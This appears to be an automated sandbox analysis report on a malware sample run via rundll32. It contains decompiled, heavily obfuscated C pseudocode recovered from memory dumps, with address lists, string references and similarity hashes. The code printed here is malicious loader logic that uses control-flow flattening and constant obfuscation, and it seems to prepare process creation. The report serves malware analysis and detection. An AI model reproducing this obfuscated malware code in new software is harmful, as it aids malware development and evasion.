0x00206f63
0x00206f6e
0x00206f79
0x00206f84
0x00206f8f
0x00206fa3
0x00206faa
0x00206fb5
0x00206fbd
0x00206fc5
0x00206fca
0x00206fd2
0x00206fda
0x00206fe4
0x00206ff2
0x00206ff7
0x00206ffd
0x00207005
0x0020700d
0x00207015
0x0020701a
0x00207022
0x0020702a
0x00207032
0x0020703a
0x0020703f
0x00207047
0x0020704f
0x0020705a
0x00207062
0x0020706d
0x00207078
0x00207083
0x0020708e
0x00207096
0x0020709b
0x002070a3
0x002070ab
0x002070b3
0x002070bb
0x002070c3
0x002070cb
0x002070d8
0x002070db
0x002070df
0x002070e4
0x002070ec
0x002070f4
0x002070fc
0x00207104
0x0020710c
0x00207114
0x0020711f
0x00207127
0x00207132
0x0020713a
0x00207142
0x0020714a
0x00207152
0x0020715a
0x0020715f
0x00207167
0x0020716c
0x00207174
0x0020717c
0x00207184
0x00207189
0x00207191
0x002071a7
0x002071ae
0x002071b9
0x002071c1
0x002071c6
0x002071ce
0x002071d6
0x002071e2
0x002071e5
0x002071e9
0x002071ee
0x002071f6
0x002071fe
0x0020720b
0x00207210
0x00207218
0x00207220
0x0020722b
0x00207236
0x00207241
0x00207249
0x0020724e
0x00207253
0x0020725b
0x00207263
0x00207268
0x00207270
0x00207278
0x00207280
0x00207285
0x0020728a
0x00207292
0x00207299
0x002072a1
0x002072a9
0x002072b1
0x002072b9
0x002072c4
0x002072cf
0x002072da
0x002072e2
0x002072e7
0x002072ec
0x002072f4
0x002072fc
0x002072fc
0x002072fe
0x002072ff
0x002072ff
0x002072ff
0x00207304
0x00207304
0x0020730a
0x00207487
0x00207497
0x002074bb
0x002074c0
0x002074d5
0x002074e1
0x002074f7
0x002074fc
0x002074ff
0x00000000
0x00207310
0x00207316
0x00207467
0x0020746d
0x00207478
0x00207478
0x0020747b
0x00000000
0x00000000
0x00207475
0x00207475
0x00207475
0x0020747d
0x00207480
0x00000000
0x0020731c
0x00207322
0x00207433
0x00207434
0x00207455
0x0020745a
0x0020745d
0x00000000
0x00207328
0x0020732e
0x00207537
0x00207334
0x00207336
0x002073d6
0x002073db
0x00207413
0x0020741a
0x0020741d
0x0020741f
0x00207427
0x002072fc
0x002072fc
0x002072fe
0x002072ff
0x002072ff
0x00000000
0x002072ff
0x0020733c
0x0020733c
0x0020733e
0x00207344
0x00207351
0x00207356
0x00207392
0x002073b4
0x002073b7
0x002073bc
0x00207504
0x00207506
0x0020750b
0x0020750b
0x00000000
0x0020733e
0x00207336
0x0020732e
0x00207322
0x00207316
0x0020753f
0x00207550
0x0020750c
0x0020750c
0x00000000
0x00207518
0x002072ff

Strings

6oD, xrefs: 00206DA5
7i, xrefs: 00206FCA
RX, xrefs: 0020725B
<], xrefs: 00206E3E
), xrefs: 00206DD0
C', xrefs: 002071B9
Sg, xrefs: 00207220
`c, xrefs: 00206E6C
"D, xrefs: 00206DC3
c, xrefs: 00207032
g)s, xrefs: 00207127

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: "D$)$6oD$7i$<]$C'$RX$Sg$`c$c$g)s
API String ID: 1514166925-3192994148
Opcode ID: 4e89df939f81ce3e0e24b337250f7837ec3a2396cba5289d6cfa60733edfe397
Instruction ID: 7ff42fae1a0f1cdcb392a41e6e6ceb48a3410670c4afda332fb97863261b760d
Opcode Fuzzy Hash: 4e89df939f81ce3e0e24b337250f7837ec3a2396cba5289d6cfa60733edfe397
Instruction Fuzzy Hash: 6C0225725187809FE3A5CF61C84AA4BBBE1FBC5748F10890CF2D9822A0D7B59959CF03

Uniqueness

Uniqueness Score: -1.00%

Function 0020BB3A, Relevance: 14.0, Strings: 11, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0020BB3A(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				char _t284;
				signed int _t317;
				void* _t322;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				intOrPtr _t357;
				signed int* _t360;

				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t284 = E0020602B(0);
				_v72 = _t284;
				_t357 = _t284;
				_v176 = 0x3707;
				_t360 =  &(( &_v188)[9]);
				_v176 = _v176 << 3;
				_t322 = 0x3701c77e;
				_t349 = 0x1b;
				_v176 = _v176 * 0x3b;
				_v176 = _v176 ^ 0x9e3c13fc;
				_v176 = _v176 ^ 0x9e596314;
				_v152 = 0x78a7;
				_v152 = _v152 + 0x292e;
				_v152 = _v152 << 3;
				_v152 = _v152 ^ 0x00050e88;
				_v180 = 0xd511;
				_v180 = _v180 ^ 0x1d80f702;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xe181230f;
				_v180 = _v180 ^ 0xe905cae0;
				_v92 = 0xc43e;
				_v92 = _v92 + 0xffff1ae3;
				_v92 = _v92 ^ 0xffffb82c;
				_v104 = 0x4365;
				_v104 = _v104 >> 5;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x000066ec;
				_v172 = 0xf4f1;
				_v172 = _v172 + 0x10b4;
				_v172 = _v172 + 0xffffc378;
				_v172 = _v172 / _t349;
				_v172 = _v172 ^ 0x000074e7;
				_v116 = 0x37b8;
				_v116 = _v116 + 0xffff57e4;
				_v116 = _v116 + 0xb626;
				_v116 = _v116 ^ 0x0000140c;
				_v144 = 0xb795;
				_t350 = 0x49;
				_v144 = _v144 * 0x50;
				_v144 = _v144 / _t350;
				_v144 = _v144 ^ 0x000091bc;
				_v76 = 0x1dd7;
				_t351 = 0x1c;
				_v76 = _v76 * 0x75;
				_v76 = _v76 ^ 0x000d9fef;
				_v108 = 0xced7;
				_v108 = _v108 >> 5;
				_v108 = _v108 / _t351;
				_v108 = _v108 ^ 0x00005a08;
				_v136 = 0x2b88;
				_v136 = _v136 ^ 0x78d809e4;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 ^ 0x0001f73d;
				_v164 = 0x766d;
				_v164 = _v164 >> 1;
				_v164 = _v164 + 0xffffabb8;
				_t352 = 0x72;
				_v164 = _v164 * 0x5c;
				_v164 = _v164 ^ 0xfff6cd9c;
				_v168 = 0x718b;
				_v168 = _v168 ^ 0xcaa0facc;
				_v168 = _v168 ^ 0xed5841e4;
				_t112 =  &_v168; // 0xed5841e4
				_v168 =  *_t112 * 0x1f;
				_v168 = _v168 ^ 0xd720c943;
				_v100 = 0x3093;
				_v100 = _v100 << 8;
				_v100 = _v100 * 0x6e;
				_v100 = _v100 ^ 0x14df3334;
				_v80 = 0xaa77;
				_v80 = _v80 | 0xec49ccd9;
				_v80 = _v80 ^ 0xec49f00b;
				_v184 = 0x6ab1;
				_v184 = _v184 << 0x10;
				_v184 = _v184 + 0x7c9;
				_v184 = _v184 + 0xb8a8;
				_v184 = _v184 ^ 0x6ab1ec4b;
				_v96 = 0xf4af;
				_v96 = _v96 * 0x3a;
				_v96 = _v96 >> 9;
				_v96 = _v96 ^ 0x00007d4d;
				_v188 = 0xb63a;
				_v188 = _v188 ^ 0x365cf355;
				_v188 = _v188 << 2;
				_v188 = _v188 + 0xd6ce;
				_v188 = _v188 ^ 0xd971d569;
				_v120 = 0xab3a;
				_v120 = _v120 * 0x32;
				_v120 = _v120 / _t352;
				_v120 = _v120 ^ 0x00002a91;
				_v156 = 0xadc6;
				_v156 = _v156 >> 9;
				_v156 = _v156 + 0xffff5d43;
				_v156 = _v156 ^ 0xffff767e;
				_v128 = 0x4e26;
				_t353 = 0x54;
				_v128 = _v128 / _t353;
				_v128 = _v128 ^ 0xbd5b2ebf;
				_v128 = _v128 ^ 0xbd5b3d92;
				_v112 = 0x5bd4;
				_v112 = _v112 | 0xfffbefdf;
				_v112 = _v112 ^ 0xfffb9ace;
				_v88 = 0x9c25;
				_v88 = _v88 | 0xd782555b;
				_v88 = _v88 ^ 0xd782aa4a;
				_v140 = 0x1cfa;
				_v140 = _v140 >> 1;
				_t354 = 0x5d;
				_v140 = _v140 / _t354;
				_v140 = _v140 ^ 0x0000306c;
				_v148 = 0xedd7;
				_v148 = _v148 ^ 0xabf54283;
				_t355 = 0x30;
				_v148 = _v148 / _t355;
				_v148 = _v148 ^ 0x03952150;
				_v124 = 0xb354;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 + 0x3a29;
				_v124 = _v124 ^ 0x0000d052;
				_v132 = 0x3532;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 | 0xce8e7aaf;
				_v132 = _v132 ^ 0xce8e32c4;
				_v160 = 0x7409;
				_v160 = _v160 | 0x6d9a42b1;
				_v160 = _v160 + 0xffff6faf;
				_v160 = _v160 >> 2;
				_v160 = _v160 ^ 0x1b6641d5;
				_v84 = 0xb2d5;
				_v84 = _v84 * 0x47;
				_v84 = _v84 ^ 0x0031fe78;
				do {
					while(_t322 != 0x94ffda2) {
						if(_t322 == 0x11e75ef4) {
							_t317 = E00202833(_v180,  &_v72, _v92, _a8, _v104, _v172);
							_t360 =  &(_t360[5]);
							__eflags = _t317;
							if(_t317 != 0) {
								_t322 = 0x94ffda2;
								continue;
							}
						} else {
							if(_t322 == 0x3336903c) {
								E0021337D(_v124, _v72, _v132, _v160, _v84);
							} else {
								if(_t322 != 0x3701c77e) {
									goto L9;
								} else {
									_t322 = 0x11e75ef4;
									continue;
								}
							}
						}
						L12:
						return _t357;
					}
					E002193A8(_v116, _v144, _v76,  &_v68, 0x44, _v108);
					_push(_v164);
					_v68 = 0x44;
					_v60 = E0021889D(0x21c000, _v136, __eflags);
					__eflags = _v152 | _v176;
					_t357 = E00207AB1(_v168, _a16, 0x21c000, 0x21c000, _v152 | _v176, _v100, 0x21c000, 0x21c000, _v80, _v184, _v96, _a28, 0, _a8, _v188, _v120, _v72, _v156, _v128, _v112,  &_v68);
					E00212025(_v88, _v60, _v140, _v148);
					_t360 =  &(_t360[0x1a]);
					_t322 = 0x3336903c;
					L9:
					__eflags = _t322 - 0x294b0e13;
				} while (_t322 != 0x294b0e13);
				goto L12;
			}

0x0020bb44
0x0020bb4d
0x0020bb4e
0x0020bb55
0x0020bb5c
0x0020bb63
0x0020bb6a
0x0020bb6b
0x0020bb6c
0x0020bb6d
0x0020bb72
0x0020bb79
0x0020bb7b
0x0020bb83
0x0020bb86
0x0020bb92
0x0020bb99
0x0020bb9c
0x0020bba0
0x0020bba8
0x0020bbb0
0x0020bbb8
0x0020bbc0
0x0020bbc5
0x0020bbcd
0x0020bbd5
0x0020bbdd
0x0020bbe2
0x0020bbea
0x0020bbf2
0x0020bbfa
0x0020bc02
0x0020bc0a
0x0020bc12
0x0020bc17
0x0020bc1c
0x0020bc24
0x0020bc2c
0x0020bc34
0x0020bc44
0x0020bc48
0x0020bc50
0x0020bc58
0x0020bc60
0x0020bc68
0x0020bc70
0x0020bc7d
0x0020bc80
0x0020bc8c
0x0020bc90
0x0020bc98
0x0020bcab
0x0020bcac
0x0020bcb3
0x0020bcbe
0x0020bcc6
0x0020bcd1
0x0020bcd5
0x0020bcdd
0x0020bce5
0x0020bced
0x0020bcf2
0x0020bcfc
0x0020bd04
0x0020bd08
0x0020bd17
0x0020bd1a
0x0020bd1e
0x0020bd26
0x0020bd2e
0x0020bd36
0x0020bd3e
0x0020bd43
0x0020bd47
0x0020bd4f
0x0020bd57
0x0020bd61
0x0020bd65
0x0020bd6d
0x0020bd78
0x0020bd83
0x0020bd8e
0x0020bd96
0x0020bd9b
0x0020bda3
0x0020bdab
0x0020bdb3
0x0020bdc0
0x0020bdc4
0x0020bdc9
0x0020bdd1
0x0020bdd9
0x0020bde1
0x0020bde6
0x0020bdee
0x0020bdf6
0x0020be03
0x0020be0f
0x0020be13
0x0020be1b
0x0020be23
0x0020be28
0x0020be30
0x0020be38
0x0020be44
0x0020be49
0x0020be4f
0x0020be57
0x0020be5f
0x0020be67
0x0020be6f
0x0020be77
0x0020be7f
0x0020be87
0x0020be8f
0x0020be97
0x0020be9f
0x0020bea4
0x0020beaa
0x0020beb2
0x0020beba
0x0020bec6
0x0020bec9
0x0020bed2
0x0020bedf
0x0020beec
0x0020bef4
0x0020befc
0x0020bf04
0x0020bf0c
0x0020bf11
0x0020bf19
0x0020bf21
0x0020bf29
0x0020bf31
0x0020bf39
0x0020bf3e
0x0020bf46
0x0020bf53
0x0020bf57
0x0020bf5f
0x0020bf5f
0x0020bf65
0x0020bf9e
0x0020bfa3
0x0020bfa6
0x0020bfa8
0x0020bfae
0x00000000
0x0020bfae
0x0020bf67
0x0020bf69
0x0020c0b1
0x0020bf6f
0x0020bf75
0x00000000
0x0020bf7b
0x0020bf7b
0x00000000
0x0020bf7b
0x0020bf75
0x0020bf69
0x0020c0ba
0x0020c0c5
0x0020c0c5
0x0020bfcf
0x0020bfd4
0x0020bfe1
0x0020bff4
0x0020c054
0x0020c06b
0x0020c082
0x0020c087
0x0020c08a
0x0020c08c
0x0020c08c
0x0020c08c
0x00000000

Strings

25, xrefs: 0020BF04
t, xrefs: 0020BF21
AX, xrefs: 0020BD3E
.), xrefs: 0020BBB8
D, xrefs: 0020BFE1
M}, xrefs: 0020BDC9
tI, xrefs: 0020BC3C
f, xrefs: 0020BC1C
):, xrefs: 0020BEF4
l0, xrefs: 0020BEAA
t, xrefs: 0020BC48

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: t$):$.)$25$D$M}$l0$AX$f$t$tI
API String ID: 0-3778435269
Opcode ID: 5cb7d051bf9cb532b59242f30e0045d2b9549fa1c208fd59fb9bef7475f617e7
Instruction ID: da9d2595123dc411c1dc5856215af804c7cc4aaef8babd4709297fd58f99cc76
Opcode Fuzzy Hash: 5cb7d051bf9cb532b59242f30e0045d2b9549fa1c208fd59fb9bef7475f617e7
Instruction Fuzzy Hash: 56D102715083819FE364CF65C889A5FFBE1BBC4358F108A1DF29A862A0D7B58959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00218F49, Relevance: 12.7, Strings: 10, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00218F49() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t245;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t258;
				void* _t264;
				intOrPtr _t282;
				void* _t286;
				signed int* _t290;

				_t290 =  &_v1144;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x4ebe6;
				_v1128 = 0x778f;
				_v1128 = _v1128 | 0xa1323825;
				_t249 = 0x13;
				_v1128 = _v1128 / _t249;
				_v1128 = _v1128 << 2;
				_t286 = 0x35c963e4;
				_v1128 = _v1128 ^ 0x21ef9208;
				_v1052 = 0x4cd;
				_v1052 = _v1052 | 0x68cff677;
				_v1052 = _v1052 ^ 0x68cf93fd;
				_v1092 = 0x77ae;
				_v1092 = _v1092 >> 0xa;
				_v1092 = _v1092 ^ 0x00005fc7;
				_v1060 = 0x2f45;
				_v1060 = _v1060 | 0xa1a9613d;
				_v1060 = _v1060 ^ 0xa1a96f30;
				_v1096 = 0x6d0d;
				_v1096 = _v1096 << 2;
				_v1096 = _v1096 | 0xf85e23e8;
				_v1096 = _v1096 ^ 0xf85f94d5;
				_v1136 = 0xe906;
				_t250 = 0x4b;
				_v1136 = _v1136 * 0x76;
				_v1136 = _v1136 + 0x8e3a;
				_v1136 = _v1136 << 8;
				_v1136 = _v1136 ^ 0x6bf6f1e6;
				_v1104 = 0x5e2e;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 * 0x2c;
				_v1104 = _v1104 ^ 0x0000496b;
				_v1144 = 0xf2e9;
				_v1144 = _v1144 + 0xd50c;
				_v1144 = _v1144 / _t250;
				_v1144 = _v1144 ^ 0x9fddb036;
				_v1144 = _v1144 ^ 0x9fdde12f;
				_v1108 = 0x6902;
				_v1108 = _v1108 | 0xfbe10d26;
				_v1108 = _v1108 * 0x44;
				_v1108 = _v1108 ^ 0xe7e09cc2;
				_v1120 = 0xf3f1;
				_v1120 = _v1120 + 0xffff8a4f;
				_v1120 = _v1120 >> 6;
				_v1120 = _v1120 * 0x67;
				_v1120 = _v1120 ^ 0x0000b01d;
				_v1088 = 0xb368;
				_v1088 = _v1088 + 0x9734;
				_v1088 = _v1088 ^ 0x00010c20;
				_v1076 = 0x650d;
				_v1076 = _v1076 ^ 0x0544b8d8;
				_v1076 = _v1076 ^ 0x054483f2;
				_v1056 = 0xabff;
				_v1056 = _v1056 ^ 0x935518d0;
				_v1056 = _v1056 ^ 0x9355abf6;
				_v1068 = 0xb772;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00028ed1;
				_v1124 = 0xbc7e;
				_v1124 = _v1124 * 0x39;
				_v1124 = _v1124 + 0x3dff;
				_v1124 = _v1124 ^ 0x966a7207;
				_v1124 = _v1124 ^ 0x9640526c;
				_v1132 = 0xba5f;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 << 5;
				_t251 = 0x75;
				_v1132 = _v1132 / _t251;
				_v1132 = _v1132 ^ 0x0197c6fa;
				_v1140 = 0x5fea;
				_t252 = 0x3c;
				_v1140 = _v1140 * 0xa;
				_v1140 = _v1140 * 0x2d;
				_v1140 = _v1140 >> 2;
				_v1140 = _v1140 ^ 0x002a725f;
				_v1100 = 0x79ec;
				_v1100 = _v1100 << 8;
				_v1100 = _v1100 ^ 0x69f808d7;
				_v1100 = _v1100 ^ 0x69818172;
				_v1084 = 0xd5eb;
				_v1084 = _v1084 ^ 0xb139babe;
				_v1084 = _v1084 ^ 0xb1392951;
				_v1072 = 0x4dbe;
				_v1072 = _v1072 ^ 0x00003bef;
				_v1080 = 0x7ef4;
				_v1080 = _v1080 / _t252;
				_v1080 = _v1080 ^ 0x00000c75;
				_v1112 = 0xcb8d;
				_v1112 = _v1112 + 0x5361;
				_v1112 = _v1112 + 0xffffff0c;
				_v1112 = _v1112 ^ 0x00015b8c;
				_v1064 = 0xba20;
				_v1064 = _v1064 ^ 0x3b22f3f3;
				_v1064 = _v1064 ^ 0x3b2222af;
				_v1116 = 0xa287;
				_v1116 = _v1116 + 0x9065;
				_t253 = 0x5f;
				_v1116 = _v1116 / _t253;
				_v1116 = _v1116 + 0xffff8b94;
				_v1116 = _v1116 ^ 0xffffc056;
				_t238 = E002185BA(_t253);
				do {
					while(_t286 != 0x2b67e243) {
						if(_t286 == 0x35036a43) {
							_push( &_v1040);
							_push( &_v520);
							return E00207B63(_v1064, _v1116, __eflags);
						}
						if(_t286 == 0x35c963e4) {
							_t286 = 0x39b3b44d;
							continue;
						}
						_t295 = _t286 - 0x39b3b44d;
						if(_t286 != 0x39b3b44d) {
							goto L8;
						}
						_push(_v1092);
						_t245 = E0021889D(0x21c9b0, _v1052, _t295);
						_pop(_t264);
						_t282 =  *0x21ca2c; // 0x495cc8
						_t196 = _t282 + 0x230; // 0x660053
						E0020C680(_t196, _v1096, _v1136, _t264, _v1104,  *0x21ca2c, _t245,  &_v520);
						_t238 = E00212025(_v1144, _t245, _v1108, _v1120);
						_t290 =  &(_t290[9]);
						_t286 = 0x2b67e243;
					}
					_push(_v1076);
					_t239 = E0021889D(0x21c980, _v1088, __eflags);
					_t240 = E00218C8F(_v1056);
					_t258 =  *0x21ca2c; // 0x495cc8
					_t210 = _t258 + 0x230; // 0x495ef8
					E002029E3(_t210, 0x104, _t239, _v1124, _v1132, _v1140, _t240,  &_v1040, _v1100, _v1084);
					_t238 = E00212025(_v1072, _t239, _v1080, _v1112);
					_t290 =  &(_t290[0xc]);
					_t286 = 0x35036a43;
					L8:
					__eflags = _t286 - 0x38d0088b;
				} while (__eflags != 0);
				return _t238;
			}

0x00218f49
0x00218f4f
0x00218f56
0x00218f5e
0x00218f66
0x00218f78
0x00218f7d
0x00218f83
0x00218f88
0x00218f8d
0x00218f95
0x00218f9d
0x00218fa5
0x00218fad
0x00218fb5
0x00218fc2
0x00218fca
0x00218fd2
0x00218fda
0x00218fe2
0x00218fea
0x00218fef
0x00218ff7
0x00218fff
0x0021900c
0x0021900d
0x00219011
0x00219019
0x0021901e
0x00219026
0x0021902e
0x00219038
0x0021903c
0x00219044
0x0021904c
0x0021905a
0x0021905e
0x00219066
0x0021906e
0x00219076
0x00219083
0x00219087
0x0021908f
0x00219097
0x0021909f
0x002190a9
0x002190ad
0x002190b5
0x002190bd
0x002190c5
0x002190cd
0x002190d5
0x002190dd
0x002190e5
0x002190ed
0x002190f5
0x002190fd
0x00219105
0x0021910a
0x00219112
0x0021911f
0x00219123
0x0021912b
0x00219133
0x0021913d
0x00219145
0x0021914a
0x00219155
0x0021915a
0x00219160
0x00219168
0x00219175
0x00219178
0x00219181
0x00219185
0x0021918a
0x00219192
0x0021919a
0x0021919f
0x002191a7
0x002191af
0x002191b7
0x002191bf
0x002191c7
0x002191d7
0x002191df
0x002191ef
0x002191f3
0x002191fb
0x00219203
0x0021920b
0x00219213
0x0021921b
0x00219223
0x0021922b
0x00219233
0x0021923b
0x00219247
0x0021924a
0x0021924e
0x00219256
0x00219262
0x00219276
0x00219276
0x00219280
0x0021938d
0x00219395
0x00000000
0x0021939c
0x0021928c
0x002192fc
0x00000000
0x002192fc
0x0021928e
0x00219290
0x00000000
0x00000000
0x00219296
0x002192a3
0x002192a8
0x002192c7
0x002192d4
0x002192da
0x002192ed
0x002192f2
0x002192f5
0x002192f5
0x00219303
0x00219310
0x0021931f
0x00219341
0x0021934d
0x00219353
0x00219369
0x0021936e
0x00219371
0x00219373
0x00219373
0x00219373
0x00000000

Strings

kI, xrefs: 0021903C
Cg+, xrefs: 00219267
E/, xrefs: 00218FCA
y, xrefs: 00219192
m, xrefs: 00218FE2
e, xrefs: 002190CD
;, xrefs: 002191D7
_r*, xrefs: 0021917C, 00219170
aS, xrefs: 00219203
_r*, xrefs: 0021918A

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: e$m$Cg+$E/$_r*$_r*$aS$kI$;$y
API String ID: 0-1402005448
Opcode ID: 8219023e5fe429a2096853977fcdd84a8e318360d13d4acbd5ba012cc945f986
Instruction ID: 8ec6c671480e19b250d1f4d4d96528fc1b3c9e504fbe5fe13c8f93466182b9bf
Opcode Fuzzy Hash: 8219023e5fe429a2096853977fcdd84a8e318360d13d4acbd5ba012cc945f986
Instruction Fuzzy Hash: 7AB1447140D3419FD358CF64C58A44BFBE1FBD4758F208A1DF5A5862A0C7B98A98CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00211773, Relevance: 12.6, Strings: 10, Instructions: 147
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00211773(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ecx;
				void* _t131;
				void* _t148;
				void* _t151;
				signed int _t162;
				void* _t164;
				signed int* _t167;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0020602B(_t131);
				_v32 = 0x943f;
				_t167 =  &(( &_v64)[6]);
				_t164 = 0;
				_t151 = 0x349de80e;
				_t162 = 0x48;
				_v32 = _v32 * 0x69;
				_v32 = _v32 ^ 0x003ccdd6;
				_v56 = 0x5d22;
				_v56 = _v56 << 0xb;
				_v56 = _v56 * 0x6c;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 ^ 0x0003a52d;
				_v48 = 0xb9ad;
				_v48 = _v48 / _t162;
				_v48 = _v48 | 0x8e45101b;
				_v48 = _v48 ^ 0xce45129f;
				_v16 = 0x4535;
				_v16 = _v16 + 0xffff440f;
				_v16 = _v16 ^ 0xbfff8944;
				_v24 = 0xd710;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x000d4c75;
				_v44 = 0x65fd;
				_v44 = _v44 >> 2;
				_v44 = _v44 | 0x32207922;
				_v44 = _v44 ^ 0x322078de;
				_v28 = 0xded8;
				_v28 = _v28 ^ 0x86a01735;
				_v28 = _v28 ^ 0x86a0c6d1;
				_v64 = 0xdb93;
				_v64 = _v64 + 0x597e;
				_v64 = _v64 << 0xa;
				_v64 = _v64 << 0xa;
				_v64 = _v64 ^ 0x5110354e;
				_v60 = 0x2ada;
				_v60 = _v60 | 0x1c3e2a8f;
				_v60 = _v60 + 0xf49a;
				_v60 = _v60 ^ 0xe6209c52;
				_v60 = _v60 ^ 0xfa1f8dfc;
				_v20 = 0xdaa6;
				_v20 = _v20 + 0xb461;
				_v20 = _v20 ^ 0x0001dcca;
				_v40 = 0x4872;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0xb451885a;
				_v40 = _v40 ^ 0xb451b970;
				_v36 = 0x262e;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 + 0x6428;
				_v36 = _v36 ^ 0x00003c11;
				_v8 = 0x6e80;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x06e82b80;
				_v12 = 0x3e9d;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x00005153;
				_v52 = 0x8462;
				_v52 = _v52 ^ 0xcdf70fa2;
				_v52 = _v52 ^ 0xe5a9b23c;
				_v52 = _v52 | 0x26296c1d;
				_v52 = _v52 ^ 0x2e7f2e4a;
				do {
					while(_t151 != 0x6cb1230) {
						if(_t151 == 0x944062a) {
							_push(_t151);
							_push(_t151);
							_t164 = E00208736(_v4 + _v4);
							if(_t164 != 0) {
								_t151 = 0x6cb1230;
								continue;
							}
						} else {
							if(_t151 == 0x30a4ce3e) {
								_t148 = E002177A3(_a4,  &_v4, _v24, _v44, _a8, _v28, 0, _v64, _v48 | _v32);
								_t167 =  &(_t167[7]);
								if(_t148 != 0) {
									_t151 = 0x944062a;
									continue;
								}
							} else {
								if(_t151 != 0x349de80e) {
									goto L11;
								} else {
									_t151 = 0x30a4ce3e;
									continue;
								}
							}
						}
						goto L12;
					}
					E002177A3(_a4,  &_v4, _v36, _v8, _a8, _v12, _t164, _v52, _v16 | _v56);
					_t167 =  &(_t167[7]);
					_t151 = 0x222ae378;
					L11:
				} while (_t151 != 0x222ae378);
				L12:
				return _t164;
			}

0x0021177a
0x0021177e
0x00211782
0x00211786
0x0021178a
0x0021178c
0x00211791
0x00211799
0x002117a3
0x002117a5
0x002117b6
0x002117b7
0x002117bb
0x002117c3
0x002117cb
0x002117d5
0x002117d9
0x002117de
0x002117e6
0x002117f9
0x002117fd
0x00211805
0x0021180d
0x00211815
0x0021181d
0x00211825
0x0021182d
0x00211832
0x0021183a
0x00211842
0x00211847
0x0021184f
0x00211857
0x0021185f
0x00211867
0x0021186f
0x00211877
0x0021187f
0x00211884
0x00211889
0x00211891
0x00211899
0x002118a1
0x002118a9
0x002118b1
0x002118b9
0x002118c1
0x002118c9
0x002118d1
0x002118d9
0x002118de
0x002118e6
0x002118ee
0x002118f6
0x002118fb
0x00211903
0x0021190b
0x00211913
0x00211918
0x00211920
0x00211928
0x0021192d
0x00211935
0x0021193d
0x00211945
0x0021194d
0x00211955
0x0021195d
0x0021195d
0x00211963
0x002119c0
0x002119c1
0x002119ca
0x002119d0
0x002119d2
0x00000000
0x002119d2
0x00211965
0x00211967
0x002119a0
0x002119a5
0x002119aa
0x002119ac
0x00000000
0x002119ac
0x00211969
